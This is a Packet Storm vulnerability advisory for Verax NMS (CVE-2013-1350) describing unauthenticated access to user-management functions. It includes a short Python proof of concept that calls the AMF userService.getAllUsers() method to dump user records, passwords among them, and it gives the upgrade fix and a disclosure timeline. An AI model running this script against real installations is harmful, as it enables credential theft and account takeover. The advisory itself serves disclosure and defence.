what you don't know can hurt you

Verax NMS Authentication Bypass

Verax NMS Authentication Bypass
Posted Mar 7, 2013
Authored by Andrew Brooks

Verax NMS suffers from multiple authentication and authorization flaws which allow a remote attacker to add and delete users, change the passwords of other users, and access other critical application data. All versions of Verax NMS prior to 2.1.0 are vulnerable.

tags | exploit, remote, bypass
advisories | CVE-2013-1350
MD5 | 84ba9340e4eb32c67dac51b3d2776daf

Verax NMS Authentication Bypass

Change Mirror Download
Verax NMS Authenication Bypass (CVE-2013-1350)

I. BACKGROUND
----------------------
Verax NMS provides a service-oriented, unified
management & monitoring of networks, applications
and infrastructure enabling quick problem detection,
root-cause analysis, reporting and automating recovery,
reducing costs and shortening downtimes of IT service delivery.

Source: http://www.veraxsystems.com/en/products/nms

II. DESCRIPTION
----------------------
Verax NMS suffers from multiple authentication and
authorization flaws which allow a remote attacker to
add and delete users, change the passwords of other users,
and access other critical application data. These issues
stem from unauthenticated methods, such as userGroupService.getAllGroups(),
which fail to validate that the user either 1) has ownership or
access rights to the requested objects/resources and 2) fails to
confirm whether or not the caller has properly authenticated to the
application and still maintains a valid session.

The below Python code can be used to test vulnerable installations. If
successful, the response will contain an array of user objects which
includes all user details, such as username, password, e-mail address, etc.
----------------------
#!/usr/bin/python

#just based on http://www.pyamf.org/tutorials/general/client.html#basic-example
from pyamf import AMF0, AMF3
from pyamf.remoting.client import RemotingService

client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
amf_version=AMF3)
service = client.getService('userService')

print service.getAllUsers()
----------------------

III. AFFECTED PRODUCTS
----------------------
All versions of Verax NMS prior to 2.1.0 are vulnerable.

IV. RECCOMENDATION
----------------------
Users should upgrade to version 2.1.0 of Verax NMS.

V. CREDIT
----------------------
This vulnerability was discovered by Andrew Brooks.

VI. REFERENCES
----------------------
CVE-2013-1350
http://download.veraxsystems.com/download/nms-2.1.0-release-notes.txt

VII. TIMELINE
----------------------
1/10/2013 - Vendor notified
1/11/2013 - Vendor acknowledges bug report
2/20/2013 - Vulnerability remediated and pushed to mainline

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close